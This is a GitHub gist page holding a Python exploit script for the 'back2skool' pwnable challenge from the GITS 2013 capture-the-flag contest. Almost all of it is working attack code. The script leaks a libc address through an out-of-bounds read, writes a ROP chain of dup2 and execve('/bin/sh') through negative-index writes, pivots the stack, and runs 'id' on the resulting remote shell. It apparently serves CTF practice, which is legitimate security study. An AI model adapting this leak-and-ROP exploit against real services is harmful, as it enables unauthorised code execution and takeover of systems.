Skip to content

Instantly share code, notes, and snippets.

@xelenonz

xelenonz/back2skool.py

Last active December 14, 2015 03:39
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save xelenonz/5022944 to your computer and use it in GitHub Desktop.
Save xelenonz/5022944 to your computer and use it in GitHub Desktop.
Download ZIP
Gits2013 Pwnable 250 back2skool sploit code *Important!! - Need to find libc offset to make exploit works!!
Raw
back2skool.py
import socket,sys,time,re
"""
$python skool.py
libc_base : 0x840000
shell_base : 0x804c11c
Exploit...
uid=1003(back2skool) gid=1003(back2skool)
"""
def readPos(index):
sk.send("read\n");sk.recv(10240)
sk.send("%d\n"%index)
match = re.findall("(\d+)",sk.recv(10240))[1]
return hex(int(match))
def writePos(index,value):
sk.send("write\n");sk.recv(10240)
sk.send("%d\n"%(-2147483648+index));sk.recv(10240)
sk.send("%d\n"%value);sk.recv(10240)
sk = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sk.connect(("mylab.local",31337))
time.sleep(1)
sk.recv(10248)
sk.send("func1\n");sk.recv(10240)
eip = 14
base_addr = 0x0804c040
# find libc_base offset by sub with recv() offset
libc_base = int(readPos(-32),16)-0x00d4630
xchg_sp_ax = libc_base+0x0005a5a0
dup2 = libc_base+0x00c40a0
execve = libc_base+0x009d6d0
pop2ret = libc_base+0x000772b7
shell = base_addr+(4*55)
print "libc_base :",hex(libc_base)
print "shell_base :",hex(shell)
# Prepare Data before Pwned!!
writePos(0,dup2)
writePos(1,pop2ret)
writePos(2,4)
writePos(3,0)
writePos(4,dup2)
writePos(5,pop2ret)
writePos(6,4)
writePos(7,1)
writePos(8,execve)
writePos(9,0x11223344)
writePos(10,shell)
writePos(11,0)
writePos(12,0)
writePos(55,0x6E69622f)
writePos(56,0x0068732f)
# Pwned Stage!!!
print "Exploit..."
writePos(eip,xchg_sp_ax) # pivot stack :)
sk.send("math\n")
sk.send("id\n");print sk.recv(10240)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment